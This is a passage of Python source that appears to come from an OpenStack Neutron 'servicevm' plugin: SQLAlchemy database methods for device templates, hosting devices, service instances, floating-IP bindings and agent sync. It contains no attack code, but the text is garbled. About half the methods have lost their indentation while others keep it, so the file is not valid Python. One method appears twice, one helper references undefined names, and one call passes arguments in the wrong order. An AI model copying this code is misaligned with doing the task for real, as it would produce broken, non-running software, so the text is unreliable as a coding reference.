            for service_type in (item['service_type']
                                 for item in template['service_types']):
                service_type_db = ServiceType(
                    id=str(uuid.uuid4()),
                    template_id=template_id,
                    servicetype=service_type)
                context.session.add(service_type_db)
        LOG.debug(_('template_db %(template_db)s %(attributes)s '),
                  {'template_db': template_db,
                   'attributes': template_db.attributes})
        return self._make_template_dict(template_db)
def update_device_template(self, context, device_template_id,
device_template):
with context.session.begin(subtransactions=True):
template_db = self._get_resource(context, DeviceTemplate,
device_template_id)
template_db.update(device_template['device_template'])
return self._make_template_dict(template_db)
    def delete_device_template(self, context, device_template_id):
        """Delete a template and its child rows.

        Refuses (DeviceTemplateInUse) while any device still references
        the template.
        """
        with context.session.begin(subtransactions=True):
            # TODO(yamahata): race. prevent from newly inserting hosting device
            # that refers to this template
            devices_db = context.session.query(Device).filter_by(
                template_id=device_template_id).first()
            if devices_db is not None:
                raise servicevm.DeviceTemplateInUse(
                    device_template_id=device_template_id)
            # Remove children first, then the template row itself.
            context.session.query(ServiceType).filter_by(
                template_id=device_template_id).delete()
            context.session.query(DeviceTemplateAttribute).filter_by(
                template_id=device_template_id).delete()
            template_db = self._get_resource(context, DeviceTemplate,
                                             device_template_id)
            context.session.delete(template_db)
def get_device_template(self, context, device_template_id, fields=None):
template_db = self._get_resource(context, DeviceTemplate,
device_template_id)
return self._make_template_dict(template_db)
def get_device_templates(self, context, filters, fields=None):
return self._get_collection(context, DeviceTemplate,
self._make_template_dict,
filters=filters, fields=fields)
# called internally, not by REST API
# need enhancement?
def choose_device_template(self, context, service_type,
required_attributes=None):
required_attributes = required_attributes or []
LOG.debug(_('required_attributes %s'), required_attributes)
with context.session.begin(subtransactions=True):
query = (
context.session.query(DeviceTemplate).
filter(
sa.exists().
where(sa.and_(
DeviceTemplate.id == ServiceType.template_id,
ServiceType.service_type == service_type))))
for key in required_attributes:
query = query.filter(
sa.exists().
where(sa.and_(
DeviceTemplate.id ==
DeviceTemplateAttribute.template_id,
DeviceTemplateAttribute.key == key)))
LOG.debug(_('statements %s'), query)
template_db = query.first()
if template_db:
return self._make_template_dict(template_db)
###########################################################################
# hosting device
def _device_attribute_update_or_create(
self, context, device_id, key, value):
arg = (self._model_query(context, DeviceAttribute).
filter(DeviceAttribute.device_id == device_id).
filter(DeviceAttribute.key == key).first())
if arg:
arg.value = value
else:
arg = DeviceAttribute(
id=str(uuid.uuid4()), device_id=device_id,
key=key, value=value)
context.session.add(arg)
# called internally, not by REST API
def _create_device_pre(self, context, device):
device = device['device']
LOG.debug(_('device %s'), device)
tenant_id = self._get_tenant_id_for_create(context, device)
template_id = device['template_id']
auth = device['auth']
name = device.get('name')
device_id = device.get('id') or str(uuid.uuid4())
attributes = device.get('attributes', {})
with context.session.begin(subtransactions=True):
template_db = self._get_resource(context, DeviceTemplate,
template_id)
device_db = Device(id=device_id,
tenant_id=tenant_id,
name=name,
description=template_db.description,
instance_id=None,
template_id=template_id,
created_at=timeutils.utcnow(),
status=constants.PENDING_CREATE,
auth=auth,
power_state=constants.DOWN)
utils.make_default_name(device_db, s_constants.PRE_DEVICE)
context.session.add(device_db)
for key, value in attributes.items():
arg = DeviceAttribute(
id=str(uuid.uuid4()), device_id=device_id,
key=key, value=value)
context.session.add(arg)
return self._make_device_dict(device_db)
# called internally, not by REST API
# intsance_id = None means error on creation
    def _create_device_post(self, context, device_id, instance_id,
                            mgmt_url, device_dict):
        """Record the outcome of instance creation on a PENDING_CREATE
        device; instance_id=None marks the creation as failed (ERROR).
        """
        LOG.debug(_('device_dict %s'), device_dict)
        with context.session.begin(subtransactions=True):
            query = (self._model_query(context, Device).
                     filter(Device.id == device_id).
                     filter(Device.status == constants.PENDING_CREATE).
                     one())
            # (xining) if create instance fail, instance_id is None, It can
            # not update db
            #query.update({'instance_id': instance_id, 'mgmt_url': mgmt_url})
            if instance_id is None:
                # Failed creation: keep whatever instance_id the caller
                # placed in device_dict and flag the device as ERROR.
                query.update({'status': constants.ERROR})
                query.update({'mgmt_url': mgmt_url})
                query.update({'instance_id': device_dict['instance_id']})
            else:
                query.update({'instance_id': instance_id, 'mgmt_url': mgmt_url})
            # Upsert any attributes produced during creation.
            for (key, value) in device_dict['attributes'].items():
                self._device_attribute_update_or_create(context, device_id,
                                                        key, value)
    def _register_agent_binding(self, context, device_id, instance):
        """Bind a device to the ServiceVM agent running on the compute
        host where *instance* was scheduled.

        :param instance: nova server object exposing
            'OS-EXT-SRV-ATTR:host' (INSTANCE_HOST_ATTR)
        """
        host = getattr(instance, INSTANCE_HOST_ATTR)
        plugin = manager.NeutronManager.get_plugin()
        agent = plugin._get_agent_by_type_and_host(context,
                n_constants.AGENT_TYPE_SERVICEVM, host)
        with context.session.begin(subtransactions=True):
            binding_db = DeviceAgentBinding(device_id=device_id,
                                            servicevm_agent_id=agent['id'])
            context.session.add(binding_db)
def _create_device_status(self, context, device_id, new_status):
with context.session.begin(subtransactions=True):
(self._model_query(context, Device).
filter(Device.id == device_id).
filter(Device.status == constants.PENDING_CREATE).
update({'status': new_status}))
    def _get_device_db(self, context, device_id, current_statuses, new_status):
        """Lock a device row, verify it is in one of *current_statuses*,
        and transition it to *new_status*.

        Raises DeviceNotFound when no row matches, DeviceInUse when the
        row is mid-update (PENDING_UPDATE).
        """
        try:
            device_db = (
                self._model_query(context, Device).
                filter(Device.id == device_id).
                filter(Device.status.in_(current_statuses)).
                with_lockmode('update').one())
        except orm_exc.NoResultFound:
            raise servicevm.DeviceNotFound(device_id=device_id)
        if device_db.status == constants.PENDING_UPDATE:
            raise servicevm.DeviceInUse(device_id=device_id)
        device_db.update({'status': new_status})
        return device_db
def _update_device_pre(self, context, device_id):
with context.session.begin(subtransactions=True):
device_db = self._get_device_db(
context, device_id, _ACTIVE_UPDATE, constants.PENDING_UPDATE)
return self._make_device_dict(device_db)
def _update_device_post(self, context, device_id, new_status,
new_device_dict=None):
with context.session.begin(subtransactions=True):
(self._model_query(context, Device).
filter(Device.id == device_id).
filter(Device.status == constants.PENDING_UPDATE).
update({'status': new_status}))
dev_attrs = new_device_dict.get('attributes', {})
(context.session.query(DeviceAttribute).
filter(DeviceAttribute.device_id == device_id).
filter(~DeviceAttribute.key.in_(dev_attrs.keys())).
delete(synchronize_session='fetch'))
for (key, value) in dev_attrs.items():
self._device_attribute_update_or_create(context, device_id,
key, value)
    def update_device_name_or_desc(self, context, device_id, name=None,
                                   desc=None):
        """Overwrite a device's name and description in one transaction.

        NOTE(review): both fields are always written, so passing only one
        of name/desc nulls the other — confirm callers always pass both.
        """
        with context.session.begin(subtransactions=True):
            (self._model_query(context, Device).
             filter(Device.id == device_id).
             one().
             update({'name': name,
                     'description': desc}))
    def _delete_device_pre(self, context, device_id):
        """Mark a device PENDING_DELETE after verifying no service
        instance is still bound to it; returns the device dict.

        Raises DeviceInUse while a ServiceDeviceBinding exists.
        """
        with context.session.begin(subtransactions=True):
            # TODO(yamahata): race. keep others from inserting new binding
            binding_db = (context.session.query(ServiceDeviceBinding).
                          filter_by(device_id=device_id).first())
            if binding_db is not None:
                raise servicevm.DeviceInUse(device_id=device_id)
            device_db = self._get_device_db(
                context, device_id, _ACTIVE_UPDATE_ERROR_DEAD,
                constants.PENDING_DELETE)
            return self._make_device_dict(device_db)
    def _delete_device_post(self, context, device_id, error):
        """Finalize deletion of a PENDING_DELETE device.

        On *error*, the device is kept and flagged ERROR; otherwise the
        device row and its attribute rows are removed.
        """
        with context.session.begin(subtransactions=True):
            query = (
                self._model_query(context, Device).
                filter(Device.id == device_id).
                filter(Device.status == constants.PENDING_DELETE))
            if error:
                query.update({'status': constants.ERROR})
                #(self._model_query(context, Device).
                # filter(Device.id == device_id).delete())
            else:
                (self._model_query(context, DeviceAttribute).
                 filter(DeviceAttribute.device_id == device_id).delete())
                (self._model_query(context, Device).
                 filter(Device.id == device_id).delete())
            #(self._model_query(context, DeviceServiceContext).
            # filter(DeviceServiceContext.device_id == device_id).delete())
            # NOTE(review): this final delete matches nothing in either
            # branch (status changed or row already gone) — appears to be
            # dead code; confirm before removing.
            query.delete()
# reference implementation. needs to be overrided by subclass
    # reference implementation. needs to be overrided by subclass
    def create_device(self, context, device):
        """Reference implementation of device creation: records the row,
        fabricates an instance id, and immediately marks it ACTIVE.
        Real drivers perform the actual spin-up asynchronously.
        """
        device_dict = self._create_device_pre(context, device)
        # start actual creation of hosting device.
        # Waiting for completion of creation should be done backgroundly
        # by another thread if it takes a while.
        instance_id = str(uuid.uuid4())
        device_dict['instance_id'] = instance_id
        self._create_device_post(context, device_dict['id'], instance_id, None,
                                 device_dict)
        self._create_device_status(context, device_dict['id'],
                                   constants.ACTIVE)
        return device_dict
# reference implementation. needs to be overrided by subclass
def update_device(self, context, device_id, device):
device_dict = self._update_device_pre(context, device_id)
# start actual update of hosting device
# waiting for completion of update should be done backgroundly
# by another thread if it takes a while
self._update_device_post(context, device_id, constants.ACTIVE)
return device_dict
# reference implementation. needs to be overrided by subclass
def delete_device(self, context, device_id):
self._delete_device_pre(context, device_id)
# start actual deletion of hosting device.
# Waiting for completion of deletion should be done backgroundly
# by another thread if it takes a while.
self._delete_device_post(context, device_id, False)
def get_device(self, context, device_id, fields=None):
device_db = self._get_resource(context, Device, device_id)
return self._make_device_dict(device_db, fields)
def get_devices(self, context, filters=None, fields=None):
devices = self._get_collection(context, Device, self._make_device_dict,
filters=filters, fields=fields)
# Ugly hack to mask internaly used record
a = [device for device in devices
if uuidutils.is_uuid_like(device['id'])]
return a
    def _mark_device_status(self, device_id, exclude_status, new_status):
        """Force a device into *new_status* under an admin context,
        unless its current status is in *exclude_status*.

        :return: True when the row was updated, False when no eligible
                 row was found.
        """
        context = t_context.get_admin_context()
        with context.session.begin(subtransactions=True):
            try:
                device_db = (
                    self._model_query(context, Device).
                    filter(Device.id == device_id).
                    filter(~Device.status.in_(exclude_status)).
                    with_lockmode('update').one())
            except orm_exc.NoResultFound:
                LOG.warn(_('no device found %s'), device_id)
                return False
            device_db.update({'status': new_status})
        return True
def _mark_device_error(self, device_id):
return self._mark_device_status(
device_id, [constants.DEAD], constants.ERROR)
def _mark_device_dead(self, device_id):
exclude_status = [
constants.DOWN,
constants.PENDING_CREATE,
constants.PENDING_UPDATE,
constants.PENDING_DELETE,
constants.INACTIVE,
constants.ERROR]
return self._mark_device_status(
device_id, exclude_status, constants.DEAD)
# used by failure policy
def rename_device_id(self, context, device_id, new_device_id):
# ugly hack...
context = t_context.get_admin_context()
with context.session.begin(subtransactions=True):
device_db = self._get_resource(context, Device, device_id)
new_device_db = Device(
id=new_device_id,
tenant_id=device_db.tenant_id,
template_id=device_db.template_id,
name=device_db.name,
description=device_db.description,
instance_id=device_db.instance_id,
created_at=timeutils.utcnow(),
mgmt_url=device_db.mgmt_url,
status=device_db.status)
context.session.add(new_device_db)
(self._model_query(context, DeviceAttribute).
filter(DeviceAttribute.device_id == device_id).
update({'device_id': new_device_id}))
context.session.delete(device_db)
###########################################################################
# logical service instance
def _get_service_type(self, context, service_type_id):
service_type_db = self._get_resource(context, ServiceType,
service_type_id)
return service_type_db['servicetype']
# called internally, not by REST API
    def _create_service_instance(self, context, device_id,
                                 service_instance_param, managed_by_user):
        """Create a ServiceInstance row bound to *device_id* and return
        its serialized dict.

        :param service_instance_param: dictionary to create
            instance of ServiceInstance. The following keys are used.
            name, service_type_id, service_table_id, mgmt_driver, mgmt_url
            mgmt_driver, mgmt_url can be determined later.
        :param managed_by_user: True when the user may reconfigure the
            service directly via the servicevm API.
        """
        name = service_instance_param['name']
        service_type_id = service_instance_param['service_type_id']
        service_table_id = service_instance_param['service_table_id']
        mgmt_driver = service_instance_param.get('mgmt_driver')
        mgmt_url = service_instance_param.get('mgmt_url')
        servicetype = self._get_service_type(context, service_type_id)
        service_instance_id = str(uuid.uuid4())
        LOG.debug('service_instance_id %s device_id %s',
                  service_instance_id, device_id)
        with context.session.begin(subtransactions=True):
            # TODO(yamahata): race. prevent modifying/deleting service_type
            # with_lockmode("update")
            device_db = self._get_resource(context, Device, device_id)
            device_dict = self._make_device_dict(device_db)
            # The instance inherits the tenant of its hosting device.
            tenant_id = self._get_tenant_id_for_create(context, device_dict)
            instance_db = ServiceInstance(
                id=service_instance_id,
                tenant_id=tenant_id,
                name=name,
                service_type_id=service_type_id,
                service_table_id=service_table_id,
                servicetype=servicetype,
                managed_by_user=managed_by_user,
                status=constants.PENDING_CREATE,
                mgmt_driver=mgmt_driver,
                created_at=timeutils.utcnow(),
                mgmt_url=mgmt_url)
            utils.make_default_name(instance_db, s_constants.PRE_SERVICE)
            context.session.add(instance_db)
            # Flush so attribute rows can reference the new instance id.
            context.session.flush()
            self._add_service_instance_attr(context, service_instance_param,
                                            service_instance_id)
            binding_db = ServiceDeviceBinding(
                service_instance_id=service_instance_id, device_id=device_id)
            context.session.add(binding_db)
        return self._make_service_instance_dict(instance_db)
    def _update_attr_value(self, context, service_param, sid):
        """Reconcile floating-IP associations of service instance *sid*
        with the new attributes in *service_param*.

        Floating IPs newly listed per fixed port are bound to the
        instance; ones no longer listed are unbound.

        NOTE(review): assumes each attribute value is a list of dicts
        carrying 'floatingip_id' and 'fixed_port_id' — confirm against
        the attribute producers.
        """
        service_instance_db = self.get_service_instance(context, sid)
        port_db_dict = {}       # existing: fixed_port_id -> [floatingip_id]
        no_port_db_list = []
        port_dict = {}          # requested: fixed_port_id -> [floatingip_id]
        no_port_list = []
        # Index the currently stored attribute bindings.
        for key, value in service_instance_db['attributes'].items():
            for v in value:
                if v['floatingip_id']:
                    fip_ids = port_db_dict.get(v['fixed_port_id'], [])
                    fip_ids.append(v['floatingip_id'])
                    port_db_dict.update({v['fixed_port_id']: fip_ids})
                else:
                    no_port_db_list.append(v['fixed_port_id'])
        # Index the requested bindings.
        for key, value in service_param['attributes'].items():
            for v in value:
                if v['floatingip_id']:
                    fip_ids = port_dict.get(v['fixed_port_id'], [])
                    fip_ids.append(v['floatingip_id'])
                    port_dict.update({v['fixed_port_id']: fip_ids})
                else:
                    no_port_list.append(v['fixed_port_id'])
        # Bind floating IPs that are requested but not yet stored.
        for (port_id, fip_ids) in port_dict.items():
            bind_fip_ids = list(set(fip_ids) - set(port_db_dict.get(port_id, [])))
            for fip_id in bind_fip_ids:
                admin_context = t_context.get_admin_context()
                port = self._core_plugin.get_port(admin_context, port_id)
                ip_address = port['fixed_ips'][0]['ip_address']
                svm_fip_db = self.l3_plugin._get_floatingip(context, fip_id)
                svm_fip_db.update({'fixed_ip_address': ip_address,
                                   'service_instance_id': sid,
                                   'fixed_port_id': port_id})
        # Unbind floating IPs that were stored but are no longer requested.
        for (port_id, fip_ids) in port_db_dict.items():
            no_bind_fip_ids = list(set(fip_ids) - set(port_dict.get(port_id, [])))
            for fip_id in no_bind_fip_ids:
                svm_fip_db = self.l3_plugin._get_floatingip(context, fip_id)
                svm_fip_db.update({'service_instance_id': None,
                                   'fixed_port_id': None,
                                   'fixed_ip_address': None})
    def _add_attr_value(self, context, service_param, sid):
        """Bind gateway/floating-IP attributes of *service_param* to *sid*.

        For each external-gateway or floating-IP attribute value, tags the
        fixed port (and, when present, the floating IP row) with the
        service instance id.
        """
        admin_context = t_context.get_admin_context()
        with admin_context.session.begin(subtransactions=True):
            for (key, values) in \
                    service_param.get('attributes', {}).items():
                if key in [s_constants.EXTERNAL_GATWAY_KEY,
                           s_constants.FLOATINGIP_KEY]:
                    for value in values:
                        fip_id = value.get('floatingip_id', None)
                        fixed_port_id = value.get('fixed_port_id')
                        port = self._core_plugin.get_port(admin_context, fixed_port_id)
                        if fip_id:
                            # Point the floating IP at the port's first fixed IP.
                            ip_address = port['fixed_ips'][0]['ip_address']
                            floatingip_db = self.l3_plugin._get_floatingip(context, fip_id)
                            floatingip_db.update({'fixed_ip_address': ip_address,
                                                  'service_instance_id': sid,
                                                  'fixed_port_id': fixed_port_id})
                        if fixed_port_id:
                            svm_port_db = self._core_plugin._get_port(admin_context, fixed_port_id)
                            svm_port_db.update({'service_instance_id': sid})
    def _add_service_instance_attr(self, context, service_param, sid):
        """Persist attribute rows for service instance *sid*, then bind them.

        Each (key, value) attribute becomes a ServiceInstanceAttribute row;
        afterwards _add_attr_value tags the referenced ports/floating IPs.
        """
        for (key, value) in \
                service_param.get('attributes', {}).items():
            attribute_db = ServiceInstanceAttribute(
                id=str(uuid.uuid4()),
                service_instance_id=sid,
                key=key,
                value=value)
            context.session.add(attribute_db)
        self._add_attr_value(context, service_param, sid)
    # reference implementation. must be overriden by subclass
    def create_service_instance(self, context, service_instance):
        """Create a service instance (managed_by_user=True) from the request body."""
        self._create_service_instance(
            context, service_instance['service_instance'], True)
    def _service_instance_attribute_update_or_create(
            self, context, service_instance_id, key, value):
        """Upsert one (key, value) attribute row for a service instance."""
        arg = (self._model_query(context, ServiceInstanceAttribute).
               filter(ServiceInstanceAttribute.service_instance_id == service_instance_id).
               filter(ServiceInstanceAttribute.key == key).first())
        if arg:
            # Row exists: overwrite the value in place.
            arg.value = value
        else:
            arg = ServiceInstanceAttribute(
                id=str(uuid.uuid4()),
                service_instance_id=service_instance_id,
                key=key, value=value)
            context.session.add(arg)
    def _update_service_instance_mgmt(self, context, service_instance_id,
                                      mgmt_driver, mgmt_url):
        """Record mgmt driver/url on an instance still in PENDING_CREATE.

        Raises if the instance is missing or no longer PENDING_CREATE
        (the query requires exactly one matching row).
        """
        with context.session.begin(subtransactions=True):
            (self._model_query(context, ServiceInstance).
             filter(ServiceInstance.id == service_instance_id).
             filter(ServiceInstance.status == constants.PENDING_CREATE).
             one().
             update({'mgmt_driver': mgmt_driver,
                     'mgmt_url': mgmt_url}))
def _update_service_instance_check(self, context, service_instance_id,
service_instance):
service_instace = self.get_service_instance(context, service_instance_id)
attr = copy.deepcopy(service_instace['attributes'])
service = service_instance['service_instance']
for key, value in service.get('attributes', {}).iteritems():
if key in attr.keys() and attr[key] != value:
del attr[key]
return True
if key in attr.keys():
del attr[key]
if attr:
return True
return False
def _update_service_instance_pre(self, context, service_instance_id,
service_instance):
with context.session.begin(subtransactions=True):
instance_db = (
self._model_query(context, ServiceInstance).
filter(ServiceInstance.id == service_instance_id).
filter(Device.status == constants.ACTIVE).
with_lockmode('update').one())
instance_db.update(service_instance)
instance_db.update({'status': constants.PENDING_UPDATE})
return self._make_service_instance_dict(instance_db)
    def _update_service_instance_post(self, context, service_instance_id,
                                      status, new_service_instance=None):
        """Finalize an instance update: set *status* and sync attribute rows.

        When *new_service_instance* is given, its attributes replace the
        stored ones (stale keys deleted, remaining keys upserted) and the
        external port/floating-IP bindings are reconciled.
        """
        with context.session.begin(subtransactions=True):
            (self._model_query(context, ServiceInstance).
             filter(ServiceInstance.id == service_instance_id).
             filter(ServiceInstance.status.in_(
                 [constants.PENDING_CREATE, constants.PENDING_UPDATE])).one().
             update({'status': status}))
            if new_service_instance:
                self._update_attr_value(context, new_service_instance,
                                        service_instance_id)
                service_instance_attrs = new_service_instance.get('attributes', {})
                # Drop attribute rows whose keys are no longer requested.
                (context.session.query(ServiceInstanceAttribute).
                 filter(ServiceInstanceAttribute.service_instance_id == \
                        service_instance_id).
                 filter(~ServiceInstanceAttribute.key.in_(
                     service_instance_attrs.keys())).delete(
                         synchronize_session='fetch'))
                for (key, value) in service_instance_attrs.items():
                    self._service_instance_attribute_update_or_create(context,
                            service_instance_id, key, value)
# reference implementation
def update_service_instance(self, context, service_instance_id,
service_instance):
service_instance_dict = self._update_service_instance_pre(
context, service_instance_id, service_instance)
self._update_service_instance_post(
context, service_instance_id, service_instance, constants.ACTIVE)
return service_instance_dict
    def _delete_service_instance_pre(self, context, service_instance_id,
                                     managed_by_user):
        """Validate a delete request and mark the instance PENDING_DELETE.

        Raises ServiceInstanceNotManagedByUser on an ownership mismatch and
        ServiceInstanceInUse when more than one device binding exists
        (the binding itself is removed later by the _post step).
        """
        with context.session.begin(subtransactions=True):
            service_instance = (
                self._model_query(context, ServiceInstance).
                filter(ServiceInstance.id == service_instance_id).
                #cinghu
                #filter(ServiceInstance.status == constants.ACTIVE).
                with_lockmode('update').one())
            if service_instance.managed_by_user != managed_by_user:
                raise servicevm.ServiceInstanceNotManagedByUser(
                    service_instance_id=service_instance_id)
            service_instance.status = constants.PENDING_DELETE

            binding_db = (
                self._model_query(context, ServiceDeviceBinding).
                filter(ServiceDeviceBinding.service_instance_id ==
                       service_instance_id).
                all())
            assert binding_db
            # check only. _post method will delete it.
            if len(binding_db) > 1:
                raise servicevm.ServiceInstanceInUse(
                    service_instance_id=service_instance_id)
    def _delete_service_instance_post(self, context, service_instance_id):
        """Remove the binding, attribute rows and the instance row itself.

        Expects exactly one device binding (guaranteed by the _pre step);
        finally detaches any ports/floating IPs still referencing the
        instance.
        """
        with context.session.begin(subtransactions=True):
            binding_db = (
                self._model_query(context, ServiceDeviceBinding).
                filter(ServiceDeviceBinding.service_instance_id ==
                       service_instance_id).
                all())
            assert binding_db
            assert len(binding_db) == 1
            context.session.delete(binding_db[0])

            (self._model_query(context, ServiceInstanceAttribute).
             filter(ServiceInstanceAttribute.service_instance_id == \
                    service_instance_id).delete())

            # Only a PENDING_DELETE instance may be removed.
            (self._model_query(context, ServiceInstance).
             filter(ServiceInstance.id == service_instance_id).
             filter(ServiceInstance.status == constants.PENDING_DELETE).
             delete())
            self._update_external_resource(context, service_instance_id)
def _update_external_resource(self, context, service_instance_id):
port_db = (
self._model_query(context, models_v2.Port).
filter(models_v2.Port.service_instance_id ==
service_instance_id).
all())
for p in port_db:
p.update({'service_instance_id':None})
fip_db = (
self._model_query(context, l3.FloatingIP).
filter(l3.FloatingIP.service_instance_id ==
service_instance_id).
all())
for f in fip_db:
f.update({'service_instance_id':None})
def _1update_external_resource(context, service_instance_id):
context = t_context.get_admin_context()
filters = {'service_instance_id': service_id}
ports = self._core_plugin.get_ports(context, filters)
for p in ports:
p['service_instance_id'] = None
self._core_plugin.update_port(context, p['id'], p)
floatingips = self.l3_plugin.get_floatingips(context, filters)
for f in floatingips:
f['service_instance_id'] = None
self.l3_plugin.update_floatingips(context, f['id'], f)
    # reference implementation. needs to be overriden by subclass
    def _delete_service_instance(self, context, service_instance_id,
                                 managed_by_user):
        """Run the two-phase delete (pre-check/mark, then purge rows)."""
        self._delete_service_instance_pre(context, service_instance_id,
                                          managed_by_user)
        self._delete_service_instance_post(context, service_instance_id)
    # reference implementation. needs to be overriden by subclass
    def delete_service_instance(self, context, service_instance_id):
        """Delete a user-managed service instance."""
        self._delete_service_instance(context, service_instance_id, True)
    def get_by_service_table_id(self, context, service_table_id):
        """Return (device_dict, service_instance_dict) for a service table id."""
        with context.session.begin(subtransactions=True):
            instance_db = (self._model_query(context, ServiceInstance).
                           filter(ServiceInstance.service_table_id ==
                                  service_table_id).one())
            # The owning device is reached through ServiceDeviceBinding.
            device_db = (
                self._model_query(context, Device).
                filter(sa.exists().where(sa.and_(
                    ServiceDeviceBinding.device_id == Device.id,
                    ServiceDeviceBinding.service_instance_id ==
                    instance_db.id))).one())
            return (self._make_device_dict(device_db),
                    self._make_service_instance_dict(instance_db))
    def get_by_service_instance_id(self, context, service_instance_id):
        """Return (device_dict, service_instance_dict) for an instance id."""
        with context.session.begin(subtransactions=True):
            instance_db = self._get_resource(context, ServiceInstance,
                                             service_instance_id)
            # The owning device is reached through ServiceDeviceBinding.
            device_db = (
                self._model_query(context, Device).
                filter(sa.exists().where(sa.and_(
                    ServiceDeviceBinding.device_id == Device.id,
                    ServiceDeviceBinding.service_instance_id ==
                    instance_db.id))).one())
            return (self._make_device_dict(device_db),
                    self._make_service_instance_dict(instance_db))
    def get_service_instance(self, context, service_instance_id, fields=None):
        """Return one service instance rendered as a dict."""
        instance_db = self._get_resource(context, ServiceInstance,
                                         service_instance_id)
        return self._make_service_instance_dict(instance_db, fields)
    def get_service_instances(self, context, filters=None, fields=None):
        """List service instances matching *filters* as dicts."""
        return self._get_collection(
            context, ServiceInstance, self._make_service_instance_dict,
            filters=filters, fields=fields)
def get_service_types(self, context, filters=None, fields=None):
service_types = self._get_collection(
context, ServiceType, self._make_service_type_dict,
filters=filters, fields=fields)
return service_types
    def get_service_type(self, context, service_type_id, fields=None):
        """Return one service type rendered as a dict."""
        service_type_db = self._get_resource(context, ServiceType,
                                             service_type_id)
        return self._make_service_type_dict(service_type_db, fields)
    def update_device_template(self, context, device_template_id,
                               device_template):
        """Apply the requested changes to a device template, return its dict."""
        with context.session.begin(subtransactions=True):
            template_db = self._get_resource(context, DeviceTemplate,
                                             device_template_id)
            template_db.update(device_template['device_template'])
            return self._make_template_dict(template_db)
    # NOTE(changzhi)
    def attach_interface(self, context):
        """Placeholder: interface attach is not implemented yet."""
        pass
    def detach_interface(self, context):
        """Placeholder: interface detach is not implemented yet."""
        pass
class ServiceVMPluginRpcDbMixin(object):
    """DB helpers backing the servicevm agent RPC API (sync, power state)."""

    def _register_service_type_sync_func(self):
        # Map service type -> name of the method that builds its sync data.
        self.service_type_sync_func = {
            s_constants.VROUTER:'_get_sync_vrouter_data',
            s_constants.VFIREWALL:'_get_sync_vfirewall_data'}
def get_devices_on_host(self, context, host):
#hxn add,test function
context = t_context.get_admin_context()
plugin = manager.NeutronManager.get_plugin()
agent = plugin._get_agent_by_type_and_host(
context, n_constants.AGENT_TYPE_SERVICEVM, host)
result = []
with context.session.begin(subtransactions=True):
device_ids = context.session.query(DeviceAgentBinding).filter_by(
servicevm_agent_id=agent.id).all()
ids = [q.device_id for q in device_ids]
query = context.session.query(Device)
for id in ids:
device = context.session.query(Device).filter_by(
id=id)
q = query.filter_by(id=id)
r = self._make_device_dict(q)
result.append(r)
return result
    def manage_device_bindings(self, context, new_ids, agent):
        """Placeholder: device/agent rebinding is not implemented yet."""
        pass
    def register_agent_devices(self, context, resources, host):
        """RPC entry: persist power states reported by the agent on *host*.

        Reports from administratively-down agents are ignored.
        """
        plugin = manager.NeutronManager.get_plugin()
        agent = plugin._get_agent_by_type_and_host(
            context, n_constants.AGENT_TYPE_SERVICEVM, host)
        if not agent.admin_state_up:
            return
        self.manage_device_power_state(context, resources)
def manage_device_power_state(self, context, resources):
with context.session.begin(subtransactions=True):
reachable_devices = resources.get('reachable', [])
dead_devices = resources.get('dead', [])
for device_id in reachable_devices:
(self._model_query(context, Device).
filter(Device.id == device_id).
one().
update({'power_state':
constants.DEVICE_POWER_STATE['reachable']}))
for device_id in dead_devices:
(self._model_query(context, Device).
filter(Device.id == device_id).
one().
update({'power_state':
constants.DEVICE_POWER_STATE['dead']}))
    def get_devices_info_by_host(self, context, host):
        """Return dicts for all devices bound to the servicevm agent on *host*."""
        plugin = manager.NeutronManager.get_plugin()
        agent = plugin._get_agent_by_type_and_host(
            context, n_constants.AGENT_TYPE_SERVICEVM, host)
        with context.session.begin(subtransactions=True):
            device_db = context.session.query(DeviceAgentBinding).filter_by(
                servicevm_agent_id=agent.id).all()
            ids = [q.device_id for q in device_db]
            # Fetch all bound devices in a single IN query.
            query = context.session.query(Device).filter(
                Device.id.in_(ids)).all()
            devices = [self._make_device_dict(d) for d in query]
            return devices
    def _get_sync_services(self,context, service_lists, active=None):
        """Attach gateway ports to each service dict in *service_lists*."""
        return self.get_svm_gw_ports(context, service_lists, active=active)
    def _get_sync_internal_interfaces(self, context, service_lists):
        """Attach internal (router-interface) ports to each service dict."""
        return self.get_svm_internal_ports(context, service_lists)
    def _get_sync_mgmt_interfaces(self, context, service_lists):
        """Attach management ports to each service dict."""
        return self.get_svm_mgmt_ports(context, service_lists)
    def _get_sync_floating_ips(self, context, service_lists):
        """Attach floating IPs to each service dict, split by role.

        Floating IPs referenced by the external-gateway attribute go under
        GW_FIP_KEY; those referenced by the floating-IP attribute go under
        FLOATINGIP_KEY. A fip present in both lists is attached to both.
        """
        service_dicts = dict((s['id'], s) for s in service_lists)
        floating_ips = self.l3_plugin.get_floatingips(context,
                            {'service_instance_id': service_dicts.keys()})
        for floating_ip in floating_ips:
            service = service_dicts.get(floating_ip['service_instance_id'])
            if service:
                gw_fips = service['attributes'].get(s_constants.EXTERNAL_GATWAY_KEY, [])
                gw_fip_ids = [gw_fip['floatingip_id'] for gw_fip in gw_fips if gw_fip['floatingip_id']]
                common_fips = service['attributes'].get(s_constants.FLOATINGIP_KEY, [])
                com_fip_ids = [f['floatingip_id'] for f in common_fips if f['floatingip_id']]
                g_fip = []
                floatingips = []
                if floating_ip['id'] in gw_fip_ids:
                    g_fip = service.get(n_constants.GW_FIP_KEY, [])
                    g_fip.append(floating_ip)
                if floating_ip['id'] in com_fip_ids:
                    floatingips = service.get(n_constants.FLOATINGIP_KEY, [])
                    floatingips.append(floating_ip)
                if g_fip:
                    service[n_constants.GW_FIP_KEY] = g_fip
                if floatingips:
                    service[n_constants.FLOATINGIP_KEY] = floatingips
        return service_lists
    def _get_router_info_list(self, context, service_lists, active=None):
        """Enrich service dicts with gateway, internal and mgmt ports and fips.

        Runs all four enrichment passes inside one subtransaction so the
        agent receives a consistent snapshot.
        """
        with context.session.begin(subtransactions=True):
            services_gw = self._get_sync_services(context,
                                                  service_lists,
                                                  active=active)
            services_internal = self._get_sync_internal_interfaces(
                context, services_gw)
            services_mgmt = self._get_sync_mgmt_interfaces(
                context, services_internal)
            services_fip = self._get_sync_floating_ips(context,
                                                       services_mgmt)
            return services_fip
    #hxn add
    def _update_fip_assoc(self, context, fip, floatingip_db, external_port):
        """Re-associate a floating IP row from the validated *fip* request.

        Also copies the rate-limit attribute through when the request
        carries one.
        """
        previous_router_id = floatingip_db.router_id
        port_id, internal_ip_address, router_id = (
            self._check_and_get_fip_assoc(context, fip, floatingip_db))
        floatingip_db.update({'fixed_ip_address': internal_ip_address,
                              'fixed_port_id': port_id,
                              'router_id': router_id,
                              'last_known_router_id': previous_router_id})
